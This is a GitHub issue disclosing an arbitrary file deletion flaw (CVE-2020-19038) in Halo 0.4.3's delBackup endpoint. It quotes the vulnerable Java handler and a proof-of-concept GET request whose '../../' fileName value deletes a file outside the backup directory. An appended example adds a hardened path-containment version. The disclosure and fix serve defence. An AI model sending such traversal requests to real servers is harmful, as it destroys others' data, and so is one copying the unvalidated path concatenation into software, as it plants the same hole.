CVE-2020-19038: Any file deletion in the background · Issue #136 · halo-dev/halo
File Deletion vulnerability in Halo 0.4.3 via delBackup.
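I confirm that I have checked (mark [ ] as [x])
- Halo user documentation
- GitHub Wiki FAQ
- Other issues
I want to submit (mark [ ] as [x])
- Bug report
- Add a new feature or function
- Request technical support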
There is an arbitrary file deletion vulnerability in the backup file deletion.
```java
@GetMapping(value = "delBackup")
@ResponseBody
public JsonResult delBackup(@RequestParam("fileName") String fileName,
                            @RequestParam("type") String type) {
    // type and fileName are concatenated into the path without any validation
    final String srcPath = System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName;
    try {
        FileUtil.del(srcPath);
        return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-success"));
    } catch (Exception e) {
        return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-failed"));
    }
}
```
e.g.

```http
GET /admin/backup/delBackup?type=posts&fileName=../../upload/2019/3/veer-15238236420190404102850332.jpg HTTP/1.1
Host: demo.halo.run
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Referer: https://demo.halo.run/admin/backup?type=posts
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=jLIF44HA_8IHwVFhq66-jAArsdL3Mtz_tg2GvNhO
```
The vulnerability was discovered by Chaitin Tech.
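
One way to contain the `type` and `fileName` parameters before deleting, as an added example that is not part of the original issue and is not Halo's own fix. The class name `SafeBackupDelete`, the helper names, the `ALLOWED_TYPES` set (only `posts` appears in the issue) and the temporary directory layout in `main` are assumptions constructed for illustration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.LinkOption;
import java.nio.file.Path;
import java.util.Set;

public class SafeBackupDelete {
    // Assumption: the valid backup types; only "posts" appears in the issue.
    private static final Set<String> ALLOWED_TYPES = Set.of("posts");

    /** Resolves type/fileName under backupRoot and rejects anything that escapes it. */
    static Path resolveBackupFile(Path backupRoot, String type, String fileName) {
        if (!ALLOWED_TYPES.contains(type)) {
            throw new IllegalArgumentException("unknown backup type");
        }
        Path typeDir = backupRoot.toAbsolutePath().normalize().resolve(type);
        // normalize() collapses "../" segments so the check sees the real target.
        Path target = typeDir.resolve(fileName).normalize();
        // The target must be a direct child of the type directory. This rejects
        // traversal, absolute paths, nested paths and an empty file name.
        if (!typeDir.equals(target.getParent())) {
            throw new IllegalArgumentException("file name escapes backup directory");
        }
        return target;
    }

    static boolean deleteBackup(Path backupRoot, String type, String fileName) throws IOException {
        Path target = resolveBackupFile(backupRoot, type, fileName);
        // Delete regular files only; directories and symlinks are refused.
        if (!Files.isRegularFile(target, LinkOption.NOFOLLOW_LINKS)) {
            return false;
        }
        return Files.deleteIfExists(target);
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample layout: one backup file and one file outside the type directory.
        Path root = Files.createTempDirectory("halo-backup");
        Path posts = Files.createDirectories(root.resolve("posts"));
        Files.createFile(posts.resolve("backup.zip"));
        Path outside = Files.createFile(root.resolve("victim.jpg"));

        System.out.println("legit delete: " + deleteBackup(root, "posts", "backup.zip"));
        try {
            deleteBackup(root, "posts", "../victim.jpg");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("outside file still exists: " + Files.exists(outside));
    }
}
```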